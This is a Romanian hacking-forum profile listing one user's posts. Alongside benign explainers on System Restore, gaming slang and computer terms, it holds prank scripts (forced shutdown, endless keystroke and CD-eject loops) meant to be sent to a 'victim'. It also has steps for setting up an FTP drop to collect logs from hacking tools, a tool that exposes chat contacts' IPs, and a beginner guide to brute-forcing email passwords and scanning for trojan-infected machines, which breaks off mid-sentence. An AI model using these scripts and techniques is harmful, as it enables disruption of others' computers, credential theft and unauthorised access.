-
Posts
563 -
Joined
-
Last visited
-
Days Won
7
Content Type
Profiles
Forums
Events
Everything posted by Hell_Spawn
-
System Restore (Instrumentul Restaurare Sistem/in continuare abreviat ca SR): System Restore monitorizeaza schimbarile in sistemul de operare si salveaza starea sistemui ca un punct de restaurare. Daca sistemul are o problema rezultata din modificarea unor setari utilizatorul poate restaura sistemul la o data anterioara, folosind unul din punctele de restaurare. Aplicatiile si sistemul pot crea puncte de restaurare atunci cand au loc modificari in sistem. SR creaza puncte de restaurare la un interval de 24h, de asemenea si utilizatorii pot crea puncte de restaurare oricand. SR nu restaureaza documentele utilizatorilor (poze, video, etc) asadar nu va cauza pierderea fisierelor personale, email-urilor, istoric rasfoire? (browsing history) sau favoritele (favorites). SR este disponibil si in Safe Mode. Monitorizarea sistemului: SR monitorizeaza fisiere critice ale sistemului si aplicatiilor, arhivand starea acestor fisiere inainte ca schimbarile sa aiba loc. SR de asemenea salveaza o intreaga copie a registrului si a catorva fisiere dinamice. Cand SR detecteaza ca utilizatorul nu foloseste computer-ul, comprima registrul si copiile fisierelor facute. SR are ca cerinte un minim de 200MB spatiu liber pe partitia de sistem (de obicei C.) Cand cantitatea de spatiu liber scade sub 50MB pe orice disc (partitie) SR trece in modul standby si nu mai creeaza puncte de restaurare. In acest timp toate punctele de restaurare sunt sterse (Windows XP are nevoie de cel putin 200MB liberi pt. o functionare optima). SR se va reactiva de indata ce 200MB (pe partitia sistemului) vor fi disponibili. Fisierele care sunt monitorizate si care nu, sunt specificate in: Extensii fisiere monitorizate Restaurarea sistemului: In timp, punctele de restaurare sunt adunate in arhive fara nicio interventie din partea utilizatorului. Daca utilizatorul are nevoie vreodata de a restaura sistemul, punctele de restaurare sunt vizibile prin interfata SR. Singura cale de accesa aceste puncte de restaurare este prin interfata SR (pt. utilizatori) sau prin API (pt. programatori) asta pt. a proteja integritatea datelor si prevenirea schimbarilor accidentale.
-
- A - AFK - din en. Away From Keyboard - tradus in ro. Nu e la calculator .AMX - este un plugin compilat facut pentru modul Admin Mod (ex.: plugin_boti.amx) .AMXX - este un plugin compilat facut pentru modul Amx Mod X (ex.: plugin_boti.amxx) ADDONS - este utilizat la serverele de Counter-Strike pentru administrarea si modificarea lor. Un Addons nu poate functiona fara MODURI si PLUGIN-URI - B - BOT - acest cuvant poate fi folosit in doua sensuri. Denumirea originala provine de la acei jucatori virtuali care ii aveti in CS (spre exemplu faci un joc nou pe plansa fy_snow dar nu ai cu cine sa te joci, si adaugi boti..jucatori virtuali controlati de calculator). Mai nou, jucatorii folosesc cuvantul BOT in sensul de insulta (vezi noob) - C - CAMP - reprezinta persoana care sta la panda si asteapta pana apare inamicul CFG - prescurtare din en. de la CONFIG care inseamna fisier de CONFIGURARE. In el se stocheaza optiuni sau comenzi care ajusteaza Counter-Strike-ul (server sau client). CHOKE (in RO. - inabusire, strangulare) - este lagul serverului. Acesta inseamna ca, computerul dvs. trimite pozitiile jucatorului la server (acesta fiind dvs. cand va jucati CS) dar si ce anume face el (impusca, scoate cutitul, etc.) dar nu ajunge acolo. Choke este cauzat de 2 lucruri: - computerul dvs. trimite prea multe pachete (pe secunda) la server ex: daca incercati sa trimiteti 100 de comenzi pe secunda la server, iar acesta accepta doar 40, o sa primiti 60 CHOKE - serverul nu poate citi toate informatiile pe care trebuie sa le primeasca (aceasta problema poate fi cauzata de LAG-ul serverului - ori are procesor prea mic, ori sunt probleme cu reteaua respectiva, etc. ) CLAN - o grupare/organizatie de jucatori buni (cel putin asa ar trebui sa fie) care isi au o denumire in genul: .:: NUME CLAN ::. NUME JUCATOR (ex: .: eXtream :. S0n|k) Aceasta grupare este condusa de obicei de un lider (lider - persoana care a creat clanul, este detinatorul acestuia) care organizeaza lupte/meciuri intre clanuri. Un clan are 5 membri...gruparea standard..desi unele isi aduna cate 20-30 de membri - F - FPS - prescurtare din en. Frames Per Second - tradus in ro. Imagini pe secunda - reprezinta numarul de frameuri (vezi FRAME) afisate pe secunda...aceasta depinde de placa video pe care o aveti instalata pe calculator FRAME - reprezinta o IMAGINE afisata de X ori pe secunda.. ex: pentru a vedea un film, sunt folosite mii de imagini...acestea fiind afisate cu 20 de frameuri/imagini pe secunda pentru ca dvs. sa il percepti ca o animatie/video...cu cat frameurile/imaginile pe secunda sunt mai mici cu atat veti vedea filmul mai incet, ca in Matrix . Counter-Strike functioneaza tot pe frameuri.. - G - Gather - asemanator cu MIX GG - din en. Good Game sau Bravo / Ai jucat bine ..inseamna ca cineva te-a aplaudat pentru cum ai jucat in runda respectiva GH / GL & HF - din engleza GoodLuck & HaveFun = Mult noroc & distrati-va - I - Imunitate - adica sunteti imun la slap, slay, kick, ban..practic administratorii nu va pot face nimic. - L - LAG - un termen folosit pentru a spune unei persoane ca are conexiune mica, inceata.. LATENCY - este timpul de raspuns intre client si server LAME - adesea la Counter-Strike, cand ramane in viata un Terorist si un CT unul dintre ei spune: 'Lame?' si celalalt accepta sau respinge..defapt inseamna o provocare in CUTITE ! Deci lame= cutite ! Limbajul l33t - este un limbaj nou, folosit de hackeri sau de persoanele care vorbesc mult pe chat ex: 4c3st4 3st3 L|mb4jUL De LeEt..D4? LOL (si derivatele , lool , lolzzz , lolozaur etc) sau Laugh Out Loud - este identicul semnului de a rade . Deci looool este una si aceeasi cu ))) LOSS - inseamna LAG-ul din afara computerului si de obicei din afara serverului (lagul intre computere). Aceasta inseamna ca in timp ce comenzile dvs. se duc la server, ele urmaresc o cale (uneori pot fi 30 de retele prin care comenzile trebuia sa treaca ca sa ajunga la server) pentru a ajunge la destinatie, iar pachetele nu ajung. Acele pachete sunt PIERDUTE (in en. LOST de unde si denumirea de LOSS)... - M - MECI - o lupta intre clanuri sau antrenament intre membrii unui clan MIX - denumire identica cu MECI MOD-uri - cu ajutorul unui mod (ex: AdminMod, AmxMod, AmXModX) se poate administra/modifica un server de Counter-Strike. Mod-urile au ca baza PLUGIN-urile si .CFG-urile - N - NOOB sau n00b, newbie - Acest cuvant este folosit cel mai des ca fiind incepator la ceva, la un joc sau serviciu pe Internet. Exista mai multe variante scrise: n00b, newb, nub, newbie dar cel mai folosit este noob. Cuvantul este utilizat mai mult ca o insulta acestor persoane incepatoare. Non-Steam - (vezi STEAM) reprezinta varianta piratata de Steam sau a jocului Counter-Strike - P - PATCH - este o varianta mai imbunatatita a unui joc, program, etc. care repara sau modifica unele lucruri, prin patch actualizezi versiunea programului sau al jocului caruia il aplici PING - Aceasta este o masura a informatiilor transmise intre calculatoare..spre ex: trimiterea coordonatelor la Counter-Strike de la client spre server si invers, de la server spre client, masurata in milisecunde PLUGIN - contine cod scris de programatori in care sunt declarate functii / comenzi care se vor executa in serverele de Counter-Strike. PLUGIN-urile se gasesc sub 2 forme: fisierul/pluginul SURSA (are extensia .SMA) si fisierul/pluginul COMPILAT (.AMX sau .AMXX). Cu ajutorul pluginurilor puteti transforma CS-ul pe care il cunoasteti in Quake, Fifa...nu total..ci doar sa faceti sa se asemene cu aceste jocuri, deoarece ca baza, tot Counter-Strike ramane - R - Re / r3 - este o prescurtare de cuvantul salutaRE/respect pe scurt..reprezinta un salut ! RUSH - reprezinta acea persoana (sau acele persoane) care fuge direct spre baza la inamici (in timp ce acestia isi reincarca arma, isi cumpara munitie, etc.) si ii omoara pe toti... - S - SKILL - reprezinta nivelul unui jucator. Spre exemplu: skill bun, skill slab, skill slabut.. Inseamna cat de bine stii CS .SMA - este sursa unui plugin care trebuie sa fie compilata ! (ex.: plugin_boti.sma) Steam - nu este un joc si nici Counter-Strike, este modulul produs de cei de la VALVE prin care isi promoveaza jocurile.
-
Iata mai jos majoritatea tipurilor de virusi, cu explicatia fiecaruia in parte: Virusul este definit ca un software cu doua caracteristici principale: - Se auto-executa. Virusul se poate atasa altor programe sau se poate ascunde in codul care ruleaza automat la deschiderea anumitor tipuri de fisiere. - Se auto-multiplica. Acest lucru este posibil prin atasarea virusului la alte programe din computer sau prin suprascrierea acestora. Virusul se auto-raspandeste cu ajutorul floppy disk-urilor sau a oricarei alte forme de schimb de date, nu numai in statia de lucru, dar si in intreaga retea. Ulterior, este activat impreuna cu partea infectata. Tinand cont de tinta infectarii, virusii pot fi clasificati in cateva categorii. Unii virusi pot avea mai multe tinte. Acestia sunt denumiti multipartiti. Virusii paraziti: - afecteaza fisierele executabile. Virusul este lansat cand fisierul executabil este pornit. Virusii paraziti pot fi: - Virusi rezidenti in memorie, care pot controla intregul sistem si il pot infecta oricand - Virusi non-rezidenti, care sunt activati numai la pornirea aplicatiei-gazda. Intrucat acesti virusi infecteaza fisiere executabile, se pot raspandi prin intermediul oricarui mediu de stocare sau de transfer a datelor: floppy disk-uri, CD-uri, modemuri, retele. Virusii se raspandesc odata cu executarea fisierului-gazda. Virusii de boot: Afecteaza fisierele executabile. Virusul este lansat cand fisierul executabil este pornit. Virusii paraziti pot fi:- Virusi rezidenti in memorie, care pot controla intregul sistem si il pot infecta oricand - Virusi non-rezidenti, care sunt activati numai la pornirea aplicatiei-gazda. Intrucat acesti virusi infecteaza fisiere executabile, se pot raspandi prin intermediul oricarui mediu de stocare sau de transfer a datelor: floppy disk-uri, CD-uri, modemuri, retele. Virusii se raspandesc odata cu executarea fisierului-gazda. infecteaza sectorul de sistem a discurilor, sectorul de boot din floppy disk-uri si hard disk-uri. Singura modalitate de replicare a acestor virusi este pornirea sistemului de pe discul infectat. Accesarea sau copierea informatiilor de pe discurile infectate nu sunt operatii riscante atata vreme cat sistemul nu este pornit de pe discul infectat. Virusii de boot rezida intotdeauna in memorie. Desi majoritatea sunt creati pentru DOS, nu tin cont de sistemul de operare, astfel ca, de fapt, toate computerele sunt vulnerabile in fata acestui tip de virus. Virusii de Master boot: sunt rezidenti in memorie, ca si virusii de boot, dar sunt localizati in sectorul master boot. Acesti virusi vor salva in alta locatie o copie curata a sectorului master boot. Virusii de Macro-uri: sunt plasati intr-unul sau mai multe macro-uri dintr-un document Microsoft Office si utilizeaza funcionalitatile puternice ale Visual Basic for Applications, care a fost creat pentru a permite utilizatorilor sa automatizeze anumite activitati. Virusii de link-uri: Nu altereaza fisierele executabile, ci structura de directoare, redirectionand calea directorului unui fisier infectat catre zona in care este localizat virusul. Dupa lansare, virusul poate incarca fisierul executabil, citind calea corecta a directorului fisierului respectiv. Virusii-pereche: creeaza un fisier executabil nou, cu acelasi nume, dar cu extensia .COM. Daca intalneste doua fisiere executabile cu acelasi nume, dar cu extensii diferite (.COM and .EXE), sistemul de operare Windows lanseaza intai fisierul .COM. Virusii ascunsi: rezida intotdeauna in memorie si incearca sa "pacaleasca" sistemul, ascunzandu-si existenta. Virusii ascunsi se multiplica si se comporta astfel incat sa preia controlul asupra datelor si continutului programelor, fara stiinta utilizatorilor sau a programelor anti-virus. Cand sistemul de operare (de exemplu prin comanda DIR) incearca sa afle dimensiunea unui program infectat, virusul ascuns scade o parte din aceste date, egala cu dimensiunea propriului cod, si o inlocuieste cu datele corecte. Astfel, daca programul este doar citit (de un scanner de virusi), dar nu este rulat, codul viral este ascuns si nu poate fi detectat. Virusii criptati: folosesc o tehnica de modificare a propriului cod viral, astfel incat programele anti-virus sa nu-i depisteze. Virusul se auto-converteste in semne criptate, pe care programul anti-virus nu le poate recunoaste. Totusi, pentru a putea sa se raspandeasca, acesti virusi trebuie sa se auto-decripteze si, astfel, pot fi detectati. Virusi specifici: - Virusul de ActiveX este scris pentru a infecta produsele Microsoft. Utilizeaza un cod incarcat de pe server si se raspandeste in statia locala. Virusul tinteste numai sistemele de operare Microsoft Windows si foloseste Microsoft Internet Explorer pentru a se raspandi. - Virusul VB script foloseste Visual Basic pentru a aduce codul de pe serverul de Web si a se raspandi in statiile de lucru locale. E suficient sa accesati o pagina de pe Internet pentru a va infecta computerul. In orice caz, virusul de acest tip are nevoie de Microsoft Internet Explorer. - Virusii de Java: comparative cu Applet-urile Java, folosite in special pentru animatie si control, programele Java pot efectua operatii riscante din punct de vedere al securitatii (ca scrierea pe hard-disk). Au aparut deja atacuri de virusi prin intermediul applet-urilor, dar cei din a doua categorie sunt mult mai periculosi. ALTE TIPURI DE VIRUSI Backdoor – tradus literalmente inseamna "poarta din spate". Mai precis, este un program care este capabil de a deschide un pasaj (mai bine zis o poarta), fara cunostinta noastra, prin care hackerul preia controlul computerului nostru. Multi virusi, imediat ce infecteaza computerul, instaleaza un backdoor pentru a permite auorului virusului de a prelua controlul computerului nostru si de a accesa informatii importante private. Unul dintre cei mai cunoscuti backdoor este Subseven, troian excelent Made in Romania! Buffer Overflow – este o tehnica de atac a unui server ce are ca scop blocarea acesuia. In practica un program este realizat astfel incat este capabil sa primeasca stringuri de date de o anumita lungime, dar atacatorul trimite respectivului server pe care ruleaza programul stringuri de date de lungime mai mare decat cea permisa, programul nereusind in timp util sa proceseze respectivele informatii. Datele in exces sunt scrise astfel in variabilele interne ale programului. Astfel programul incepe sa dea rezultate eronate pana cand se ajunge la blocarea serverului. Sniffing – Aceasta tehnica consta in interceptarea datelor ce sunt transferate intr-o retea precum si eventuala decodificare a acestora in vederea obtinerii de informatii confidentiale (parole, numere de carti de credit). Sniffingul este o operatiune delicata, deoarece atacatorul trebuie sa se gaseasca in interiorul respectivei retele pentru a putea captura datele in tranzit. Pentru a va putea proteja de sniffing e recomandata folosirea criptografiei (canale VPN, SSL). DoS – Denil of Service este un atac specific doar serverelor ce gazduiesc siteuri Web sau FTP. Atacul consta in trimiterea de mii de cereri de acces in acelas timp, pana cand siteul sau serverul FTP cade. Este putin probabil ca voi puteti fi tinta unui asfel de atac, insa fara sa stiti puteti participa la un astfel de atac daca sunteti infectat cu vreun troian. Exploit – Nici un sistem de operare sau program nu este perfect. Plecand de la acest principiu atacatorul foloseste erorile de programare ale unui program, penru a prelua controlul computerului tinta. Acesta este motivul pentru care Miscrosoft pune la dispozitia utilizatorilor updateuri ale programelor sale. Cele mai periculoase exploituri sunt cele care nu sunt dezvaluite publicului, fiind cunoscute doar de membril respectivului grup de hackeri care le-au descoperit. Keylogger – Un keylogger este un program capabil de a inregistra tot ceea ce scriem de la tastatura si chiar de a face screenshots (capura de ecran) in anumite conditii. Odata strans un anumit volum de informatii, acestea vin trimise fara cunostinta utilizatorului, autorului keyloggerului. In acest mod atacaorul poate afla informatii precum username/password de la diverse siteuri, numere de carti de credit ... Keyloggerul vine instalat in urma instalarii unui virus sau a unui troian, sau chiar in urma instalarii unui program oficial, descarcat insa dintr-o sursa nesigura. Va recomand deci descarcarea programelor de pe siteurile oficiale ale acestora. Port-scanning – Toate computerele dispun de 65.535 porturi, care sunt de fapt puncte de acces cu exteriorul, ce pot fi utilizate pentru diverse tipuri de comunicare. Tehnica port-scanning consta in verificarea porturilor pentru a vedea care dintre acestea sunt deschise. Raspunsurile posibile sunt: accepted inseamna ca portul e deschis; denied inseamna ca portul e inchis, dropped indica lipsa unui raspuns, filtered indica prezenta unui filtru care impiedica pasagiul. Atacatorii folosesc aceasta metoda pentru a vedea care porturi sunt deschise, si odata descoperit un port deschis, se va incerca in atac pe respctivul port in vederea preluarii controlului computerului. Programele firewall recente au o functie care impiedica port-scanningul, ingreunand viata potentialilor atacatori. Trojan Horse – Sunt programe periculoase care se ascund in interiorul altor programe pentru a trece neobservate in momentul instalarii. Odata instalat un astfel de troian, permite celui care l-a creat de a controla computerul victima. Suntem noi cei care instalam asfel de programe fara sa stim. Vin in special intr-un mesaj email sub forma unui colegament, sau sunt ascunsi in programe normale descarcate din locuri nesigure.
-
- 1
-
-
Apache Apache este un puternic open source web server dezvoltat de catre Apache Group. Acesta ruleza pe sitemele de operare Unix, Linux, sau Windows; este o aplicatie ca o derivare a originalului server de web NCSA dezvoltat de Universitate Illinois din Urbana-Champaigne. Apache este cel mai polpular server web de pe internet, si mult mai puternic decat Internet Information Server al firmei Microsoft, cel mai apropiat competitor. Applet Un applet este forma diminutivata pentru app (aplicatie), cu referire la programe simple, cu o singura functie, distribuite foarte des impreuna cu produse complexe. Programe Windows de tipul: Calculator, Manager de fisiere si Notepad constituie exemple de applet-uri. ANSI American National Standards Institute - organizatie a grupurilor industriilor americane care colaboreaza cu comitete de standarde din alte tari pentru a dezvolta criterii ce faciliteaza schimburile si telecomunicatiile internationale. Cele mai importante realizari ale ANSI in domeniul informatic constau in: ASCII, SCSI si ANSI.SYS. Attachement (atasament) Orice fisier cu legat de un mesaj e-mail constituie un atasament. O serie intreaga de pachete de e-mail utilizeaza modul de cifrare MIME pentru a atasa diferite fisiere la mesajele e-mail. Autentificare Autentificarea asigura transmiterea corecta a datelor digitale catre server-ul destinatar. In mod similar, autentificarea asigura destinatarul asupra integritatii mesajului si a sursei acestuia. Cea mai simpla forma de autentificare necesita un nume de utilizator si o parola pentru accesarea unui anume cont. Avatar Un avatar este o imagine miniaturizata (persoana, obiect, animal) special aleasa de dvs. pentru a va reprezenta pe internet (folosit destul de des pe forumuri). Bit - cifra binara. Un bit constituie cea mai mica unitate de date utilizata in informatica, cu valoare egala cu 1 sau 0, abreviat cu ajutorul literei cursive b si reprezentata deseori cu ajutorul prefixului kilo - (pentru 1,024 biti, sau 210) sau mega - (1,024 x 1,024 biti). bps - biti per secunda Viteza de procesare a informatiilor este masurata in numarul de biti ce pot fi transferati intr-o secunda. Noile generatii de modemuri au viteza de procesare a informatiilor mai mare de 9.600 bps, masurata in kilobiti per secunda: 14,4 kbps constituie un minimum acceptabil. Byte De regula, un byte defineste 8 biti (denumit totodata octet sau cuvant), pe care computerele le trateaza ca unitate singulara. Secventele complexe de tipul celor de 16 si 32 de biti sunt totodata utilizate in limbajul informatic. Un byte este abreviat cu ajutorul majusculei B. Browser Program de navigare Web; Un browser reprezinta interfata dumnevoastra cu mediul Web, cu interpretare a fisierelor hypertext, cu posibilitate de navigare prin nodurile Internet. Exemple de browser-e: Internet Explorer, Firefox Mozilla, Opera. Certificat digital Un certificat digital reprezinta un fisier protejat prin parola de acces, ce include o varietate de informatii de tipul: numele si adresa e-mail a detinatorului de certificat digital, o cheie de cifrare ce poate fi utilizata pentru a verifica semnatura digitala a posesorului si perioada de validitate a certificatului digital. Autoritatile de certificare (CA) colecteaza informatii despre o anumita companie sau persoana fizica, eliberand ulterior un nou certificat digital; anumite tehnologii (SET, SSL, Authenticode) isi disputa in mediul Web piata online a certificatelor digitale. Chat Cu ajutorul aplicatiilor software speciale sau interfete web specifice, utilizatorii Internet acceseaza arii de discutii sau "spatii virtuale" unde pot comunica in timp real cu alte persoane din mediul Web. In timp ce mare parte din programele software permit utilizatorilor sa discute prin tastarea cuvintelor, o serie de aplicatii atribuie elemente tip "avatar" sau personaje 2D sau 3D pentru fiecare utilizator. Totodata, un numar important de aplicatii permit utilizatorilor sa discute verbal si video in timp real cu ceilalti participanti, prin intermediul placilor de sunet/video. Client Este un program care cere (intr-o pereche client/server). De exemplu, functionarea unui browser(navigator) de web, este legata de fapt de niste cereri pe care acesta le face catre un server. Cont de e-mail Echivalentul casutei postale - locul unde sunt pastrate mesajele pentru fiecare utilizator. Cookie In conformitate cu Netscape, un cookie este un "mecanism general pe care conexiunile realizate dinspre partea server-ului il poate utiliza pentru a stoca si recupera informatii dinspre partea clientului". Mai exact, un cookie este un fisier de date, cu dimensiune redusa, stocat in computerul dvs. personal de catre anumite site-uri online vizualizate cu ajutorul programului de navigare Web. Acest tip de fisiere de date contine informatii pe care site-urile Web le pot utiliza pentru a urmari parole de acces, liste cu paginile online vizitate recent, precum si data la care ati accesat anumite locatii online. Din setarile browserului se pot chiar bloca aceste "prajituri". CSS (Cascading Style Sheets CSS) Permite dezvoltatorilor controlul simultan asupra stilului si a modului de afisare a informatiilor incluse in multiple pagini Web. CSS functioneaza drept matrita, permitand definirea stilului atribuit unui element HTML, aplicat ulterior unui numar nelimitat de pagini. Prin intermediul specificatiilor CSS, oricand doriti sa realizati o modificare asupra unui element, puteti rectifica foarte usor stilul de afisare, urmand ca respectivul element sa fie actualizat instant in toate sectiunile paginilor Web in care este inclus. E-mail sau email sau posta electronica Posta electronica faciliteaza transmiterea de mesaje cu ajutorul computerului personal, prin intermediul retelei locale, via Internet sau cu ajutorul unui serviciu online, de tipul CompuServe sau America Online, cu posibilitate de livrarea catre unul sau mai multi destinatari. Modul de functionare consta in transmiterea mesajului catre o casuta postala virtuala, urmand ca verificarea acesteia sa fie realizata direct sau prin intermediul unei aplicatii software automate. Fiecare utilizator al serviciului e-mail are o adresa proprie de forma nume@domeniu. FTP Protocol de transfer al fisierelor - protocol internet utilizat pentru a copia fisiere intre diferite computere conectate la retea FTP anonim Un serviciu FTP care permite conectarea oricarui utilizator cu ajutorul cuvântului anonymous ca nume de utilizator si al adresei sale de posta Internet ca parola. Gazda Orice calculator din retea este numit gazda Internet. Calculatoarele gazda care "servesc" continutul catre alte gazde, sac calculatoarele de stocare, sunt numite servere. Calculatoarele gazda care primesc continut sunt numite clienti. GIF Un format frecvent folosit în paginile Web, pentru imagini. Gopher Un serviciu de Internet mai vechi, rar folosit, care oferea unele dintre functionalitatile din World Wide Web. Era un sistem ierarhic, care prezenta continutul sub forma de rezumat în niste formulare. Grupuri de discutii Conversatii în grup pe Internet. Home Page (prima pagina) Un homepage are rol introductiv in cadrul unui site Web; este de obicei prima pagina a site-ului, pagina de start. HTML (Hypertext Markup Language) HTML reprezinta o colectie de comenzi de aranjare a elementelor, ce creeaza documente hypertext (pagini Web). Cand accesati o adresa tip URL, programul de navigare Web interpreteaza comenzile HTML incluse in pagina si le utilizeaza pentru a aranja textul si elementele de grafica. Comenzile HTML acopera o gama variata de aranjare a textului (aldin si cursiv, liste, titluri de diferite marimi etc.) si prezinta totodata caracteristica de a include elemente de grafica si alte elemente non-text. Dezvoltarea si administrarea standardelor HTML este coordonata de catre World Wide Web Consortium. Hyperlink Hyperlink-urile (trimiteri Web) constituie cuvinte sau fraze subliniate in momentul in care sunt accesate prin clic si utilizate pentru a crea trimiteri catre alte documente Web. Keywords (cuvinte cheie) Cuvintele introduse de utilizator in caseta de editare, atunci cand cauta. De exemplu, in cazul google, la cautarea dupa "munti"....munti este cuvantul cheie. SEO (Search Engine Optimizing, Optimizarea pentru motoarele de cautare) Se refera la optimizarea unui site web in vederea obitnerii unui maxim de vizibilitate in motoarele de cautare. Spam sau mesaje spam Spam catalogheaza mesajele cu caracter comercial trimise catre multipli destinatari, prin intermediul adreselor de e-mail, al grupurilor de stiri si discutii online, forumuri etc. URL (uniform resource locator) URL reprezinta echivalentul Internet al adresei reale, ce functioneaza in mod similar celorlalte tipuri de adrese, prin trecerea de la informatii generice la date de ordin specific. Hacker = persoana care se ocupa cu dejucarea securitatii unui sistem informatic; initial, termenul a fost utilizat pentru a face referire la spargerea unui computer de la distanta prin intermediul unei retele de comunicare cum ar fi internetul (asa-numiti 'black hats hackers'), dar si la cei care depaneaza sau rezolva probleme de securitate ('white hats hackers'); cel mai vechi inteles al termenului se referea la folosirea fara autorizatie a retelei telefonice a unei companii (acum termenul utilizat cu acest sens este 'phreaker'); la ora actuala, termenul este folosit cu sensul de la infractori prin intermediul computerului, in principal din cauza generalizarii prin mass media a acestui cuvant. Phishing = incercare de a obtine in mod fraudulos informatii confidentiale, precum numele de utilizator, parola si detalii legate de cartea de credit, prin imitarea aproape de perfectiune a paginii de web a unei companii credibile si care are loc prin intermediul unei forme de comunicare electronica; eBay, PayPal si, in general, bancile care efectueaza tranzactii online sunt tintele predilecte; phishingul se face prin intermediul e-mail-ului sau al mesageriei instant si de obicei redirectioneaza utilizatorii spre o pagina identica cu cea a companiei credibile, unde utilizatorului i se cere sa-si introduca informatiile personale; phishingul ar putea fi considerat o forma moderna de inginerie financiara. Pharming = forma de atac a hacker-ilor folosita in scopul de a redirectiona traficul unui site web catre un altul si care se realizeaza prin specularea vulnerabilitatii serverelor DNS care sunt responsabile de transformarea adresei tastate de un utilizator in browser in adresa fizica (IP), antivirusii sau antispyware nu pot proteja impotriva pharming-ului deoarece acest tip de atac nu are loc asupra calculatorului personal, ci asupra serverelor DNS care directioneaza utilizatorul catre site-ul cerut.
-
Un program foarte frumos si foarte usor de folosit. Tot ce trebuie sa faceti este sa deschideti programul si ip`urile celor cu care vorbiti pe messenger vor fi afisate Download
-
1) Afisarea unui mic mesaj urmata de stingerea calculatorului @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s Salvati fisierul .bat si trimiteti la victima 2) Aprinderea/stingerea rapida a butonului de caps lock Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop Salvati fisierul cu extensia .vbs si trimiteti 3) Scoaterea CD-Drive`ului pe termen nelimitat Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Salvati fisierul cu extensia .vbs si trimiteti 4) Lovirea butonlui enter simultan Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop Salvati fisierul cu extensia .vbs si trimiteti 5) Lovirea butonului backspace simultan MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop Salvati fisierul cu extensia .vbs si trimiteti 6) Scierea automata de la tastatura "you are a fool"=Esti pr**t Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a fool." loop Salvati fisierul cu extensia .vbs si trimiteti 7) Deschiderea programului notepad incontinua @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Salvati fisierul cu extensia .vbs si trimiteti Sper ca vau fost de folos aceste scripturi la ceva
-
Multi dintre noi utilizatori ai programelor de hack nu stiu cum sa isi primeasca inapoi informatia luata de la programelele de hack. 1. Intrati pe http://www.drivehq.com 2. Click sign up free 3. Completati si facetiva cont 4. Da`ti click pe new folder 5. Redenumiti folderul logs 6. Folderu ar trebui sa se creeze instantaneu 7. Acum il puteti seta in programul respectiv
-
- 1
-
-
Pentru hackeri Incepatori ce ar trebui sa stie. Aceasta este prima lectie in lumea hackului. Mai departe vei putea afla si invata cele mai elemntare lucruri pe care trebuie sa le stie fiecare hacker incepator! Desi sunt niste lucruri nu stit de complicate, ele sunt foarte utile si sunt sigur ca le veti utiliza si mai departe in drumul Dvs. de hacker! Instrumentele oricarui hacker! Aici voi descrie arsenalul unui hacker, chiar daca este incepator! Cred ca aceste instrumente va vor fi de folos si in continuare! - Brute Force - Scanerul porturilor - Scanerul securitatii - Joiner - Mail Bomber - Spargerea parolelor Windows - Vizualizarea parolelor - Trojan - KeyLogger - Ascunderea IP (proxy/socks) Deci sa incepem pe rand¦ Brute Force Brute Force din engleza inseamna forta bruta. Se foloseste la descarcarea parolelor la e-mail, ftp-servere si altele¦ Exista mai multe tipuri de programe brute force, dare le au mai multe functii commune. Cind folositi brute force la conexiunile mai mici de 56 kb adica dial-up, descarcarea parolelor poate foarte fi lung¦ iar cind folosim adsl, fibra optica sau satelit, descarea are loc mult mai repede, in schimb se maninca mult traffic. Cea mai optimala solutie este sa descarci parola prin intermediul listelor de parole. Hackerul alcatuieste un file text in care sunt amplasate toate parolele posibile a tintei, programa se conecteaza la serverul indicat si incepe sa aleaga pe rind parolele din fileul text cu parole(lista). Deasemnea aceste liste pot fi din parole primitive, adica cind urmaeaza astfel: a-ab-abc-abcd-abcde¦pina la lungimea de 10-30 GB!! Cu asemnea liste sau dictionare de parole, cum li se mai zice, este greu si mult sa nimereasca parola, dar este foarte eficient! Daca atacul are loc asupra unui e-mail, este necesar de indicat brute force-ului serverul datelor de intrare . Ex: daca vrem sa spargem adresa postala “ lamer@hacksome.md, cel mai des serverul datelor de intrare va fi: pop.hacksome.md. Iar daca spargem nu e-mail adresa dar siteul http://www.hacksome.md, atunci trebuie sa indici programei brute force ftp-serverul acestui site: ftp.hacksome.md Programele Brute Force mai au inca multe functii utile ca: daca stii ca parole persoanei este de 5 caractrere iar prima litera este L, atunci poti folosi descarcarea parolei dupa masca: L####. Printre cele mai bune programe Brute Force sunt: Brutus AET2, wwwHack si altele. Spre exemplu, azi mai multe service email au brute force programe, special create de hackeri pentru acestea! Am facut o descriere generala iar pentru o cunoastere mai in de aproape, urmariti siteul nostrum, echipa noastra va lamuri totul mai detailat! Scanerul porturilor Programele ce scaneaza un interval de ip-uri cu un port deschis indicat se numeste scaner de porturi. Daca scanerul va gasi o ip adresa cu acest port deschis, el va fi adaugat in lista dvs. Deasemenea, exista si scanere doar de intervale de ip adrese. Unde se folosesc aceste scanere? Uneori, creatorii troianilor isi include un scanner de port creatiile lor. Aceasta este deoarece serverul troianului(fileul care trebuie sa stea in calculatorul tintei) ajungind in calculatorul jertfei, deschide in sistema un port, prin care acesta primeste comenzile clientului(hackerului). Pentru cei ce inca nu stiu: daca stim care port face lagatura cu troianul nostru, cu ajutorul scanerului de porturi intrebam fiecare calculator dupa adresa ip daca este acel port deschis sau nu. Cind scanerul gaseste adresele cu acel port deschis, inseamna ca pe acel calculator sta deja un troian de al nostru sin e putem conecta la acesta! Printre cele mai bune scanere se alfa si Essentional Net Tools si unu simplu dar foarte util Angry IP/Port Scanner. Despre porturi puteti studia mai amanuntit pe siteul nostru! Scnerul securitatii In tot internetul exista doua tipuri principale de pagini web: statice si dinamice [php, ASP, CGI]. Daca paginile sunt scrise in html atunci continutul paginii nu conteaza de utilizatorii obisnuiti si mereu ramine neschimbata statica. Paginile dinamice prelucreaza datele primate de la utilizatori, adica pot gindi daca asa sa ne exprimam. De aici facem concluzia ca in paginile statice nu pot fi nici un fel de gauri de securitate. Aceste gauri exista numai in paginile dinamice. Cele mai raspindite vulnerabilitati 